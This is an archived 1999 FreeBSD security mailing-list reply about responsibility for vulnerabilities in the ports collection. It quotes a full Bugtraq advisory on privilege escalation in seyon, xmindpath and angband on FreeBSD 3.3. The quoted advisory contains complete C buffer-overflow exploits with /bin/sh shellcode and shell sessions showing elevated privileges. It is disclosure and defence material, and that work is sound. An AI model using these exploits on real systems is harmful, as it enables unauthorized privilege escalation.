Date: Wed, 01 Dec 1999 10:54:54 -0800 From: "Jordan K. Hubbard" <jkh@zippy.cdrom.com> To: Bill Swingle <unfurl@dub.net> Cc: security@FreeBSD.ORG, btellier@usa.net Subject: Re: [btellier@USA.NET: Several FreeBSD-3.3 vulnerabilities] Message-ID: <35686.944074494@zippy.cdrom.com> In-Reply-To: Your message of "Wed, 01 Dec 1999 09:32:42 PST." <19991201093242.A71817@dub.net>
next in thread | previous in thread | raw e-mail | index | archive | help
> FreeBSD vulnerabilities are few and far between, and even fewer are
> published on Bugtraq. Having something as simple as this get past us is
> really embarassing. It says to the security community at large that
> we're not even concerned enough with security to fix these small holes.
> We all know that's not true.
The problem is that they're often not even posted to the correct
source. In this case, for example, the holes aren't "part of FreeBSD"
proper, they're part of our 2794 entry ports collection and
Mr. Tellier posted his report to the security officer.
It would be simply impossible for one or two people to track security
over all of FreeBSD and 2,700 3rd party packages (a certain percentage
of which aren't even testable at any given time due to patch creep,
tarball fennerization, bitrot, etc) and I don't blame the security
officer for wondering why these issues weren't brought up directly
with the ports team and/or the individual maintainers for these ports.
Being able to divide labor into reasonable (read: even marginally sane)
pieces is why we have a ports collection and ports maintainers. Any
bug which is found with a port, be it a security issue or a full-on
crash, should be reported to the relevant maintainer so that he or she
can quickly commit a patch to the ports' patches directory and get
everyone past the issue as quickly as possible.
- Jordan
>
> I'm not sure who dropped the ball here, and I'm not pointing fingers. I
> just hope that we can pull together in the future to avoid more of this.
>
> (just my .04)
>
> -Bill
>
> ----- Forwarded message from Brock Tellier <btellier@USA.NET> -----
>
> X-Mailer: USANET web-mailer (M3.4.0.33)
> Date: Tue, 30 Nov 1999 16:08:29 MST
> Reply-To: Brock Tellier <btellier@USA.NET>
> From: Brock Tellier <btellier@USA.NET>
> Subject: Several FreeBSD-3.3 vulnerabilities
> To: BUGTRAQ@SECURITYFOCUS.COM
> Greetings,
>
> RANT
> I've given the FreeBSD team about a month to get something official together.
> Maintainers were supposedly contacted, but no progress has been made. As
> promised, here are the goods:
>
> OVERVIEW
> Vulnerabilities in seyon, xmindpath and angband can be used to upgrade
> privileges.
>
> BACKGROUND
> All of the vulnerabilities discussed herein are based on my work on
> FreeBSD 3.3-RELEASE. Each of the programs was installed with the
> default permissions given when unpacked with sysinstall.
> These permissions are:
> -rwxr-sr-x 1 bin dialer 88480 Sep 11 00:55 /usr/X11R6/bin/seyon
> -rwsr-xr-x 1 uucp bin 7780 Sep 11 05:15 /usr/X11R6/bin/xmindpath
> -r-xr-sr-x 1 bin games 481794 Sep 11 01:10 /usr/X11R6/bin/angband
> These programs may be installed on other systems with different
> permissions as a result of a version change or a different packing
> scheme.
>
> DETAILS
>
> Vuln #1 The Seyon Mess
>
> To summarize: Seyon was supposedly not meant to run with additional
> privileges. There are numerous problems with seyon and I've probably not
> found all of them. They are:
>
> Buffer Overflows:
> 1. $HOME
> 2. seyon -emulator $BUF
> 3. seyon -modems $BUF
> 4. many long text box input string overflows while in program
> Input Validation:
> 1. seyon will search $PATH for "xterm" and "seyon-emu" and exec with
> fullprivs (as noted in previous advisory)
> 2. seyon -emulator /program/to/execute/with/full/privs
>
> These privileges might be upgradable to root if you are able to a.
> trojan a dialer-writable file or b. use a symlink attack to clobber .rhosts o
r
> similar c. snoop device i/o.
>
> Vuln #2 xmindpath
>
> /usr/X11R6/bin/xmindpath (suid uucp by default), contains a buffer
> overflow which will allow any user to gain uucp privs. Simply enough:
> xmindpath -f $BUF
>
> See my "faxalter" advisory for more info on gaining root w/euid uucp.
>
> Vuln #3 fun and egid games
>
> Want to impress your friends with the highest tetris score known to man?
>
> Gain egid games with a buffer overflow in /usr/X11R6/bin/angband. The
> overflows are:
> angband -u$BUF
> angband -d$BUF
>
> EXPLOITS
>
> Seyon:
> I've not written buffer overflow exploits for Seyon since an
> equivalent-yield program execution vulnerability exists, but it is
> certianly possible. The latter exploit is:
> seyon -emulator /program/to/execute
>
> Note that you'll have to execute a program that will ignore the args
> that seyon passes to it automatically as shown:
>
> bash-2.03$ echo 'void main() { system("/usr/bin/id"); }' > id.c
> bash-2.03$ gcc -o id id.c
> bash-2.03$ seyon -emulator ./id
> uid=1000(xnec) gid=1000(xnec) egid=68(dialer) groups=68(dialer),
> 1000(xnec)
>
> xmindpath:
> bash-2.03$ ls -la `which xmindpath`; id
> -rwsr-xr-x 1 uucp bin 7780 Sep 11 05:15 /usr/X11R6/bin/xmindpath
> uid=1000(xnec) gid=1000(xnec) groups=1000(xnec)
> bash-2.03$ ./xmindx
> FreeBSD xmindpath exploit /path/to/xmindpath -f $RET
> Brock Tellier btellier@usa.net
> Using addr: 0xbfbfcfa8
> bash-2.03$ xmindpath -f $RET
> lock open: File name too long
> $ id
> uid=1000(xnec) euid=66(uucp) gid=1000(xnec) groups=1000(xnec)
> $
>
> /*
> *
> * FreeBSD 3.3 xmindpath exploit gives euid uucp
> * Compile: gcc -o xmindx xmindx.c
> * Usage: ./xmindx <offset>
> /path/to/mindpath -f $RET
> * Brock Tellier <btellier@usa.net>
> *
> */
>
>
> #include <stdlib.h>
> #include <stdio.h>
>
> char shell[]= /* mudge@l0pht.com */
> "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
> "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
> "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
> "\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh";
>
> #define EGGLEN 2048
> #define RETLEN 279
> #define ALIGN 3
> #define NOP 0x90
>
> int main(int argc, char *argv[]) {
>
> long int offset=0;
> int i;
> int egglen = EGGLEN;
> int retlen = RETLEN;
> long int addr = 0xbfbfcfa8;
> char egg[EGGLEN];
> char ret[RETLEN];
>
> if (argc == 2) offset = atoi(argv[1]);
>
> addr=addr + offset;
>
> fprintf(stderr, "FreeBSD xmindpath exploit /path/to/xmindpath -f $RET\n");
> fprintf(stderr, "Brock Tellier btellier@usa.net\n");
> fprintf(stderr, "Using addr: 0x%x\n", addr);
>
> memset(egg,NOP,egglen);
> memcpy(egg+(egglen - strlen(shell) - 1),shell,strlen(shell));
>
> for(i=ALIGN;i< retlen;i+=4)
> *(int *)&ret[i]=addr;
>
> memcpy(egg, "EGG=", 4);
> putenv(egg);
> memcpy(ret,"RET=",4);
> putenv(ret);
>
> system("/usr/local/bin/bash");
>
> }
>
>
> angband:
>
> bash-2.03$ gcc -o angames angames.c
> bash-2.03$ angband `./angames`
> eip=0xbfbfc6b4 offset=0 buflen=1095
> NOPs to 1021
> Shellcode to 1088
> eip to 1092
> garbage to 1094
> $ id
> uid=1000(xnec) gid=1000(xnec) egid=13(games) groups=13(games), 1000(xnec)
> $
>
> /* FreeBSD 3.3 angband exploit yields egid of group games
> * usage: gcc -o angames angames.c
> /path/to/angband `./angames <offset>`
> * overflow is 1088bytes of NOP/Shellcode + 4bytes EIP +2bytes garbage
> * Brock Tellier <btellier@usa.net>
> */
>
>
> #include <stdio.h>
>
> char shell[]= /* mudge@lopht.com */
> "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
> "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
> "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
> "\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh";
>
>
> main (int argc, char *argv[] ) {
> int x = 0;
> int y = 0;
> int offset = 0;
> int bsize = 1095; /* 2bytes"-u" + overflowed buf's bytes + */
> char buf[bsize]; /* 4bytesEBP + 4bytesEIP + 2bytesGarbage */
> char arg[bsize + 2];
> int eip = 0xbfbfc6b4; /* FreeBSD 3.3 */
>
> if (argv[1]) {
> offset = atoi(argv[1]);
> eip = eip + offset;
> }
> fprintf(stderr, "eip=0x%x offset=%d buflen=%d\n", eip, offset, bsize);
>
> for ( x = 0; x < 1021; x++) buf[x] = 0x90;
> fprintf(stderr, "NOPs to %d\n", x);
>
> for ( y = 0; y < 67 ; x++, y++) buf[x] = shell[y];
> fprintf(stderr, "Shellcode to %d\n",x);
>
> buf[x++] = eip & 0x000000ff;
> buf[x++] = (eip & 0x0000ff00) >> 8;
> buf[x++] = (eip & 0x00ff0000) >> 16;
> buf[x++] = (eip & 0xff000000) >> 24;
> fprintf(stderr, "eip to %d\n",x);
> buf[x++] = 'X';
> buf[x++] = 'X';
> fprintf(stderr, "garbage to %d\n", x);
>
> buf[bsize - 1] = '\0';
>
> sprintf(arg, "-u%s", buf);
> arg[bsize + 1] = '\0';
>
> printf("%s", arg);
>
> }
>
> Brock Tellier
> UNIX Systems Administrator
> Chicago, IL, USA
>
> ____________________________________________________________________
> Get free email and a permanent address at http://www.netaddress.com/?N=1
>
> ----- End forwarded message -----
>
> --
> -=| --- B i l l S w i n g l e --- http://www.dub.net/
> -=| unfurl@dub.net - unfurl@freebsd.org - bill@cdrom.com
> -=| Different all twisty a of in maze are you, passages little
>
>
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?35686.944074494>